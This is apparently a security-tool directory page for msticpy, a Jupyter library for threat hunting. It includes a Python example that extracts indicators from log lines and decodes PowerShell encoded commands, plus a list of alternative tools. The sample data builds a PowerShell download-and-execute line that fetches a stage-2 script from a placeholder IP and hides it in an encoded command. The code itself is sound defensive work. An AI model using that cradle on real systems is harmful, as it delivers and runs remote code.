msticpy

Free

msticpy is a library for InfoSec investigation and hunting in Jupyter Notebooks. It includes functionality to:

- Query log data from multiple sources
- Enrich the data with Threat Intelligence, geolocations and Azure resource data
- Extract Indicators of Activity (IoA) from logs and unpack encoded data
- Perform sophisticated analysis such as anomalous session detection and time series decomposition
- Visualize data using interactive timelines, process trees and multi-dimensional Morph Charts
- Save time with notebook tools such as widgets to set query time boundaries, select and display items from lists, and configure the notebook environment

It was initially developed to support Jupyter Notebook authoring for Azure Sentinel and has since been extended to pull log data from other sources.
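To make the "extract IoA from logs and unpack encoded data" point concrete, here is an added, self-contained illustration of that processing step. It is not msticpy code and does not call msticpy's API; it shows the shape of the problem the library addresses: re-fanging defanged URLs, pulling IPs, domains, URLs and hashes out of log lines, decoding a PowerShell `-EncodedCommand` blob (base64 over UTF-16LE) and scanning the decoded script as well. The log lines, the TLD list and the encoded script are all constructed for the example.

```python
"""Added illustration, not msticpy code: IoC extraction plus base64 unpacking
over a few constructed log lines. Regexes and the TLD list are deliberately
small; a real extractor uses fuller patterns and a complete TLD list."""
import base64
import re
from collections import defaultdict
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|io)\b")  # toy TLD list
MD5_RE = re.compile(r"\b[a-fA-F0-9]{32}\b")
SHA256_RE = re.compile(r"\b[a-fA-F0-9]{64}\b")
# powershell -EncodedCommand / -enc / -e <base64 of a UTF-16LE script>
ENC_CMD_RE = re.compile(
    r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def refang(text):
    """Undo common defanging so the URL/domain patterns can match."""
    return (text.replace("[.]", ".").replace("(.)", ".")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def valid_ipv4(candidate):
    """The regex accepts 999.999.999.999; reject octets above 255."""
    return all(0 <= int(octet) <= 255 for octet in candidate.split("."))


def unpack_encoded_commands(text):
    """Decode every -EncodedCommand blob in the text; skip ones that are not
    valid base64 or not valid UTF-16LE rather than failing the whole line."""
    scripts = []
    for match in ENC_CMD_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            scripts.append(raw.decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return scripts


def extract_iocs(text, depth=0):
    """Return {kind: set(values)} for the IoCs found in text and in any
    encoded command embedded in it (bounded recursion)."""
    found = defaultdict(set)
    clean = refang(text)
    if depth < 3:
        for script in unpack_encoded_commands(clean):
            for kind, values in extract_iocs(script, depth + 1).items():
                found[kind] |= values
    # Remove the base64 blob before pattern matching so runs of hex-looking
    # characters inside it cannot trigger the hash rules.
    clean = ENC_CMD_RE.sub(" ", clean)
    for url in URL_RE.findall(clean):
        found["url"].add(url)
        host = urlparse(url).hostname
        if host and IPV4_RE.fullmatch(host):
            if valid_ipv4(host):
                found["ipv4"].add(host)
        elif host:
            found["domain"].add(host)
    found["ipv4"] |= {ip for ip in IPV4_RE.findall(clean) if valid_ipv4(ip)}
    found["domain"] |= set(DOMAIN_RE.findall(clean))
    found["md5"] |= set(MD5_RE.findall(clean))
    found["sha256"] |= set(SHA256_RE.findall(clean))
    return {kind: values for kind, values in found.items() if values}


# Constructed sample data (assumption: not real telemetry or a real campaign).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")
SAMPLE_LOGS = [
    "Outbound connection to 203.0.113.42:443 from host WS01",
    "Proxy: GET hxxp://malicious[.]example[.]com/payload.bin",
    "Process: powershell.exe -nop -w hidden -EncodedCommand " + ENCODED,
    "Hash observed: 0123456789abcdef0123456789abcdef",
]


def run_sample():
    """Merge the IoCs from all constructed log lines into one dict of sets."""
    merged = defaultdict(set)
    for line in SAMPLE_LOGS:
        for kind, values in extract_iocs(line).items():
            merged[kind] |= values
    return dict(merged)


if __name__ == "__main__":
    for kind, values in sorted(run_sample().items()):
        print(kind, sorted(values))
```

The point of the recursion is that the stage-2 download URL and its IP never appear in plain text in the log line; they only surface after the `-EncodedCommand` blob is decoded, which is exactly why an extractor has to unpack before it matches.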

ALTERNATIVES

An open source threat intelligence platform for storing and managing cyber threat intelligence knowledge.

Cyber Intelligence Management Platform with threat tracking, forensic artifacts, and YARA rule storage.

Container of 200 Windows EVTX samples for testing detection scripts and training on DFIR.

eCrimeLabs provides a SOAR platform for threat detection and response, integrated with MISP.

Sigma is a generic and open signature format for SIEM systems and other security tools to detect and respond to threats.

A free and open-source OSINT framework for gathering and analyzing data from various sources.

Open source web app for storing and searching Actor related data from users and public repositories.

Tool for managing YARA rules on VirusTotal.